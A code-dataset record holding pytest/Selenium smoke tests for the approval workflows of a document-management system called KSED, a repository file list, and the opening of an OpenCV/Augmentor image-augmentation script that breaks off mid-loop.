from KSED.Tests.T713 import KSEDsoftDisAfterAcceptSoglwithRemark_RD
from KSED.Tests.T714 import KSEDreturnDisFromDelegatAfterReject_RD
from KSED.Tests.T715 import KSEDreturnDisAfterTakeTask
from KSED.Tests.T716 import KSEDsoftDisFromDelegatAfterReject_RD
from KSED.Tests.T717 import KSEDsoftDisAfterTakeTask
@pytest.mark.KSED_smoke_test
def test_681(web_browser):
    """Create an approval card of kind "RD" (regulatory document)."""
    page = KSEDCreatDocCS_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
def test_682(web_browser):
    """Create an approval card of kind "LND" (local normative document)."""
    page = KSEDCreatDocCS_LND(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
@pytest.mark.KSED_smoke_test
def test_683(web_browser):
    """Create an approval card of kind "Other"."""
    page = KSEDCreatDocCS_ETC(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
def test_684(web_browser):
    """Add an employee to an approval stage."""
    page = KSEDaddPerson(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.creation_of_the_approval_route()
@pytest.mark.KSED_smoke_test
def test_685(web_browser):
    """Build the approval route (individual route)."""
    page = KSEDCreatWaySogl(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.creation_of_the_approval_route()
@pytest.mark.KSED_smoke_test
def test_686(web_browser):
    """Build the approval route (standard route)."""
    # Step 1: create the document and log out.
    page = KSEDCreatWaySogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out of the system
    # Step 2: reopen the document and build the approval route.
    page = KSEDCreatWaySogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
@pytest.mark.KSED_smoke_test
def test_687(web_browser):
    """Send a document for approval."""
    # Step 1: create the document.
    page = KSEDNaprSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
@pytest.mark.KSED_smoke_test
def test_688(web_browser):
    """Upload a new attachment version while the document is "Under approval"."""
    # Step 1: create the document.
    page = KSEDaddNewVersion(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    # Step 4: recall the document from approval.
    page.rejectYourself()
    # Step 5: upload a new version of the file.
    page.attachment_docReady()
@pytest.mark.KSED_smoke_test
def test_689(web_browser):
    """Upload an attachment while the document is "Under approval"."""
    # Step 1: create the document.
    page = KSEDaddNewAtt(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    # Step 4: recall the document from approval.
    page.rejectYourself()
    # Step 5: upload a brand-new file.
    page.attachment_NewDoc()
@pytest.mark.KSED_smoke_test
def test_690(web_browser):
    """Main approval: author routes a document, approver accepts it."""
    # Step 1: create the document as the author and log out.
    page = KSEDacceptSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out of the system
    # Step 2: reopen the document and build the approval route.
    page = KSEDacceptSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: accept the document as the approver.
    page2 = KSEDacceptSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
@pytest.mark.KSED_smoke_test
def test_691(web_browser):
    """Main approval (document rejection by the approver)."""
    # Step 1: create the document as the author.
    page = KSEDreject_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: reject the document as the approver.
    page2 = KSEDreject_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
@pytest.mark.KSED_smoke_test
def test_692(web_browser):
    """Internal approval: approver forwards the document to an internal approver."""
    # Step 1: create the document as the author.
    page = KSEDinnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDinnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
@pytest.mark.KSED_smoke_test
def test_693(web_browser):
    """Internal approval (recall from internal approval)."""
    # Step 1: create the document as the author.
    page = KSEDrejectInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDrejectInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    # Step 5: recall the internal approval.
    page2.rejectInnerSogl()
@pytest.mark.KSED_smoke_test
def test_694(web_browser):
    """Internal approval (recall the internal-approval task from the internal approver)."""
    # Step 1: create the document as the author.
    page = KSEDrejectTaskInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval, then recall that task.
    page2 = KSEDrejectTaskInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.rejectTaskInnerSogl()
@pytest.mark.KSED_smoke_test
def test_695(web_browser):
    """Internal approval (re-send for internal approval after recalling the task)."""
    # Step 1: create the document as the author.
    page = KSEDrepeatInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval, recall the task, then re-send.
    page2 = KSEDrepeatInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.rejectTaskInnerSogl()
    page2.repeatInnerSogl()
@pytest.mark.KSED_smoke_test
def test_696(web_browser):
    """Internal approval - issuing a decision.

    Author creates and routes a document, the main approver sends it for
    internal approval, and the internal approver accepts it.
    """
    # Step 1: create the document as the author.
    page = KSEDAcceptInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDAcceptInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: accept the internal approval as the internal approver.
    # FIX: the original created page3 but kept calling page2 (copy-paste
    # slip); all step-5 actions now go through page3. Both objects wrap the
    # same web_browser, so the executed browser actions are unchanged.
    page3 = KSEDAcceptInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
    page3.USER_LOGOUTs()  # log out of the system
@pytest.mark.KSED_smoke_test
def test_697(web_browser):
    """Working with remarks (adding remarks to a document)."""
    # Step 1: create the document as the author.
    page = KSEDaddComment(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: add a remark as the approver.
    page2 = KSEDaddComment(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.addComment()
@pytest.mark.KSED_smoke_test
def test_700(web_browser):
    """Perform the "Take the task" action on an "Approve document" task."""
    # Step 1: create the document as the author and log out.
    page = KSEDtakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out of the system
    # Step 2: reopen the document and build the approval route.
    page = KSEDtakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: take the task as the delegate.
    page2 = KSEDtakeTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
@pytest.mark.KSED_smoke_test
def test_701(web_browser):
    """Perform the "Return the task" action on an "Approve document" task."""
    # Step 1: create the document as the author and log out.
    page = KSEDbackTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out of the system
    # Step 2: reopen the document and build the approval route.
    page = KSEDbackTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: take the task as the delegate.
    page2 = KSEDbackTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
    # Step 5: return the task.
    page2.backTask_RD()
@pytest.mark.KSED_smoke_test
def test_702(web_browser):
    """Recall a decision after rejecting a document."""
    # Step 1: create the document as the author and log out.
    page = KSEDreturnDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out of the system
    # Step 2: reopen the document and build the approval route.
    page = KSEDreturnDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: reject the document as the approver.
    page2 = KSEDreturnDecision_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # Step 5: recall the decision.
    page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_703(web_browser):
    """Soften a decision after rejecting a document."""
    # Step 1: create the document as the author and log out.
    page = KSEDsoftDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out of the system
    # Step 2: reopen the document and build the approval route.
    page = KSEDsoftDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: reject the document as the approver.
    page2 = KSEDsoftDecision_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # Step 5: soften the decision.
    page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_704(web_browser):
    """Internal approval (rejection followed by a decision recall)."""
    # Step 1: create the document as the author.
    page = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: reject the internal approval, then recall that decision.
    page3 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.RejectInnerSogl()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_705(web_browser):
    """Internal approval - soften the decision after a rejection."""
    # Step 1: create the document as the author.
    page = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: reject the internal approval, then soften that decision.
    page3 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.RejectInnerSogl()
    page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_706(web_browser):
    """Internal approval - recall the decision after an acceptance."""
    # Step 1: create the document as the author.
    page = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: accept the internal approval, then recall that decision.
    page3 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_707(web_browser):
    """Internal approval - recall the decision after acceptance with remarks."""
    # Step 1: create the document as the author.
    page = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: accept the internal approval, then recall that decision.
    page3 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_708(web_browser):
    """Internal approval - soften the decision after acceptance with remarks."""
    # Step 1: create the document as the author.
    page = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: accept the internal approval, then soften that decision.
    page3 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
    page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_709(web_browser):
    """Internal approval - adding comments as the internal approver."""
    # Step 1: create the document as the author.
    page = KSEDaddCommentInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDaddCommentInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: add a comment as the internal approver.
    # FIX: the original created page3 but kept calling page2 (copy-paste
    # slip); all step-5 actions now go through page3. Both objects wrap the
    # same web_browser, so the executed browser actions are unchanged.
    page3 = KSEDaddCommentInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.addComment()
@pytest.mark.KSED_smoke_test
def test_710(web_browser):
    """Internal approval after a previously added comment is removed."""
    # Step 1: create the document as the author.
    page = KSEDInnerSoglAfterAddComment_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: send for internal approval as the main approver.
    page2 = KSEDInnerSoglAfterAddComment_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: comment, accept with the comment, then accept cleanly.
    # FIX: the original created page3 but kept calling page2 (copy-paste
    # slip); all step-5 actions now go through page3. Both objects wrap the
    # same web_browser, so the executed browser actions are unchanged.
    page3 = KSEDInnerSoglAfterAddComment_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.addComment()
    page3.AcceptInnerSoglWithComment()
    page3.AcceptInnerSogl()
@pytest.mark.KSED_smoke_test
def test_711(web_browser):
    """Main approval with remarks."""
    # Step 1: create the document as the author.
    page = KSEDacceptSoglwithRemark_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: accept the document as the approver.
    page2 = KSEDacceptSoglwithRemark_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
@pytest.mark.KSED_smoke_test
def test_712(web_browser):
    """Main approval with remarks followed by a decision recall."""
    # Step 1: create the document as the author.
    page = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: accept the document, then recall the decision.
    page2 = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
    page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_713(web_browser):
    """Main approval with remarks followed by a decision softening."""
    # Step 1: create the document as the author.
    page = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: accept the document, then soften the decision.
    page2 = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
    page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_714(web_browser):
    """Delegate recalls the decision after the main approver's rejection."""
    # Step 1: create the document as the author.
    page = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: reject the document as the main approver.
    page2 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # FIX: original logged out via the stale `page` object and fetched the
    # document via `page2` inside the page3 session; each session now uses
    # its own page object. Both wrap the same web_browser, so the executed
    # browser actions are unchanged.
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: recall the decision as the delegate.
    page3 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
    page3.LogIN('tst_user1', 'Changeme!')
    page3.getDoc()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_715(web_browser):
    """Recall the decision after the delegate's rejection."""
    # Step 1: create the document as the author and log out.
    page = KSEDreturnDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out of the system
    # Step 2: reopen the document and build the approval route.
    page = KSEDreturnDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: take the task as the delegate and reject the document.
    page2 = KSEDreturnDisAfterTakeTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
    page2.rejectDoc()
    # FIX: original logged out via the stale `page` object and fetched the
    # document via `page2` inside the page3 session; each session now uses
    # its own page object. Both wrap the same web_browser, so the executed
    # browser actions are unchanged.
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: recall the decision as the main approver.
    page3 = KSEDreturnDisAfterTakeTask(web_browser)
    page3.LogIN('YatskinRS', 'Changeme!')
    page3.getDoc()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_716(web_browser):
    """Delegate softens the decision after the main approver's rejection.

    NOTE: the original docstring duplicated test_714's "recall" wording,
    but this test calls softDecision_RD (softening), per its class name
    KSEDsoftDisFromDelegatAfterReject_RD.
    """
    # Step 1: create the document as the author.
    page = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route.
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval.
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out of the system
    # Step 4: reject the document as the main approver.
    page2 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # FIX: original logged out via the stale `page` object; use the object
    # of the active session. Both wrap the same web_browser, so the executed
    # browser actions are unchanged.
    page2.USER_LOGOUTs()  # log out of the system
    # Step 5: soften the decision as the delegate.
    page3 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page3.LogIN('tst_user1', 'Changeme!')
    page3.getDoc()
    page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_717(web_browser):
    """Softening of the decision after the delegate's rejection."""
    # Step 1: create the document
    page = KSEDsoftDisAfterTakeTask(web_browser)
    LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
    Creat_doc = page.Creat()
    saveLink = page.LinkDocWFile()
    Logout = page.USER_LOGOUTs()  # log out of the system
    # Step 2: build the approval route
    page = KSEDsoftDisAfterTakeTask(web_browser)
    LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
    getDoc = page.getDoc()
    create_route = page.creation_of_the_approval_route()
    # Step 3: attach a file and send for approval
    attach = page.attachment()
    NapSoglasovanie = page.NapSoglasovanie()
    Logout = page.USER_LOGOUTs()  # log out of the system
    # Step 4: take over the task and reject
    page2 = KSEDsoftDisAfterTakeTask(web_browser)
    LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
    getDoc = page2.getDoc()
    take = page2.takeTask_RD()
    reject = page2.rejectDoc()
    Logout = page2.USER_LOGOUTs()  # was `page` — use the active page object for consistency
    # Step 5: soften the decision as the main approver
    page3 = KSEDsoftDisAfterTakeTask(web_browser)
    LogIn_page = page3.LogIN('YatskinRS', 'Changeme!')
    getDoc = page3.getDoc()
    returnDis = page3.softDecision_RD()
|
[
"/KSED/Pages/PageObject.py",
"/KSED/TestData/data.py",
"/KSED/TestData/locators.py",
"/KSED/TestData/pages.py",
"/KSED/Tests/tk11644.py",
"/KSED/Tests/tk11652.py",
"/KSED/Tests/tk11655.py",
"/KSED/Tests/tk11679.py",
"/KSED/Tests/tk11690.py",
"/KSED/Tests/tk11704.py",
"/KSED/Tests/tk11727.py",
"/KSED/Tests/tk11742.py",
"/KSED/Tests/tk11778.py",
"/KSED/Tests/tk11943.py",
"/KSED/Tests/tk11957.py",
"/KSED/Tests/tk12011.py",
"/KSED/Tests/tk12030.py",
"/KSED/Tests/tk12913.py",
"/KSED/Tests/tk12935.py",
"/KSED/Tests/tk12936.py",
"/KSED/Tests/tk13799.py",
"/KSED/Tests/tk13862.py",
"/KSED/Tests/tk15745.py",
"/KSED/Tests/tk15812.py",
"/KSED/Utils/decorator.py",
"/KSED/conftest.py",
"/KSED/test_Allure.py",
"/KSED/test_CardSoglas.py",
"/KSED/test_Interface.py",
"/KSED/test_Login.py",
"/KSED/test_PD.py",
"/KSED/test_PVK.py",
"/KSED/test_Poruchenie.py",
"/KSED/test_Profile.py",
"/KSED/test_Protocol.py",
"/KSED/test_RD.py",
"/KSED/test_Reestr.py",
"/KSED/test_Resolution.py",
"/KSED/test_SZ.py",
"/KSED/test_Zaprosi.py",
"/KSED/test_metods.py",
"/KSED/test_poshtuchno.py",
"/KSED/test_smoke.py"
] |
010404/SS-pytorch-mine
|
import os
import cv2
import argparse
import Augmentor
# File paths for the augmentation pipeline (all configurable from the CLI).
parser = argparse.ArgumentParser()
parser.add_argument('--Images', type=str, default='D:/untitled/.idea/SS_torch/Augmentor_img', help='true picture')
parser.add_argument('--final', type=str, default='D:/untitled/.idea/SS_torch/Augmentor_img/output', help='final picture')
parser.add_argument('--Masks', type=str, default='D:/untitled/.idea/SS_torch/Augmentor_mask', help='Mask picture')
parser.add_argument('--jpg_right', type=str, default='D:/untitled/.idea/SS_torch/dataset/jpg_right', help='final picture')
parser.add_argument('--png_right', type=str, default='D:/untitled/.idea/SS_torch/dataset/png_right', help='final masks')
parser.add_argument('--transtxt', type=str, default='D:/untitled/.idea/SS_torch/dataset/trans.txt', help='transtxt')
opt = parser.parse_args()
print(opt)

txt = opt.transtxt
# Read the list of sample names; `with` guarantees the handle is closed
# (the original left the file object open).
with open(txt, "r") as paths:
    data = [line.rstrip('\n') for line in paths]

imgway_1 = opt.Images
imgway_2 = opt.final
JPG_RIGHT = opt.jpg_right
PNG_RIGHT = opt.png_right
# Counters used to rename the augmented outputs in the loop below.
n1 = 1
n2 = 1
# Run the augmentation: for each listed sample, copy image+mask into the
# Augmentor working folders, generate 3 augmented variants, then rename the
# outputs and move them into the final jpg/png folders.
for index in range(len(data)):
    # Read the image and its label mask (-1 = cv2.IMREAD_UNCHANGED).
    image = cv2.imread("D:/untitled/.idea/SS_torch/dataset/jpg/%s" % data[index] + ".jpg", -1)
    mask = cv2.imread("D:/untitled/.idea/SS_torch/dataset/png/%s" % data[index] + ".png", -1)
    # Copy the pair into the folders Augmentor reads from.
    # NOTE(review): the mask is written as .jpg (lossy) — confirm this is intended.
    cv2.imwrite("%s/%s.jpg" % (imgway_1, data[index]) ,image)
    cv2.imwrite("%s/%s.jpg" % (opt.Masks, data[index]) , mask)
